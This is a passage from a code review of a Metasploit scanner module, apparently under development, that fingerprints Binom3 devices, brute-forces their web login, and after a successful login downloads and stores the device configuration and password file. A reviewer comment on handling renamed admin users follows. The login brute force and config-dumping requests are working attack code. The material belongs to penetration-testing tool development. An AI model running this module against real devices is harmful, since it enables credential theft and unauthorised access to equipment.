modules/auxiliary/scanner/http/binom3_login_config_pass_dump.rb

```diff
@@ -0,0 +1,206 @@
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+  #
+  # Check if App is Binom3
+  #
+
+  def is_app_binom3?
+    begin
+      res = send_request_cgi(
+        {
+          'uri' => '/',
+          'method' => 'GET'
+        }
+      )
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
+      print_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+      return false
+    end
+
+    if (res && res.code == 200 && res.headers['Server'] && (res.headers['Server'].include?('Team-R Web') || res.body.include?('binom_ico') || res.body.include?('team-r')))
+
+      print_good("#{rhost}:#{rport} - Binom3 confirmed...")
+
+      return true
+    else
+      print_error("#{rhost}:#{rport} - Application does not appear to be Binom3. Module will not continue.")
+      return false
+    end
+  end
+
+  #
+  # Brute-force the login page
+  #
+
+  def do_login(user, pass)
+    print_status("#{rhost}:#{rport} - Trying username:#{user.inspect} with password:#{pass.inspect}")
+    begin
+
+      res = send_request_cgi(
+        {
+          'uri' => '/~login',
+          'method' => 'POST',
+          'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' },
+          'vars_post' =>
+            {
+              'login' => user,
+              'password' => pass
+            }
+        }
+      )
+
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
+
+      vprint_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+      return :abort
+
+    end
+
+    if (res && res.code == 302 && res.get_cookies.include?('IDSESSION'))
+
+      print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
+
+      report_cred(
+        ip: rhost,
+        port: rport,
+        service_name: 'Binom3',
+        user: user,
+        password: pass
+      )
+
+      # Set Cookie
+
+      get_cookie = res.get_cookies
+      cookie = get_cookie + ' NO-HELP=true; onlyRu=1'
+
+      # Attempting to download config / password file(s)
+
+      config_uri = '~cfg_ask_xml?type=cfg'
+
+      res = send_request_cgi({ 'method' => 'GET', 'uri' => config_uri, 'cookie' => cookie })
+
+      if res && res.code == 200
+        print_good('++++++++++++++++++++++++++++++++++++++')
+        print_good("#{rhost} - dumping configuration")
+        print_good('++++++++++++++++++++++++++++++++++++++')
+
+        print_good("#{rhost}:#{rport} - File retrieved successfully!")
+        path = store_loot(
+          'Binom3_config',
+          'text/xml',
+          rhost,
+          res.body,
+          rport,
+          'Binom3 device config'
+        )
+        print_status("#{rhost}:#{rport} - File saved in: #{path}")
+      else
+        print_error("#{rhost}:#{rport} - Failed to retrieve configuration")
+        return
+      end
+
+      if user == 'root'
```

Comment:
can new 'admin' users be created, or 'root' renamed?  I would think it may be easier to just throw the GET request, and handle the result accordingly.  While slightly noisier, it may handle more cases.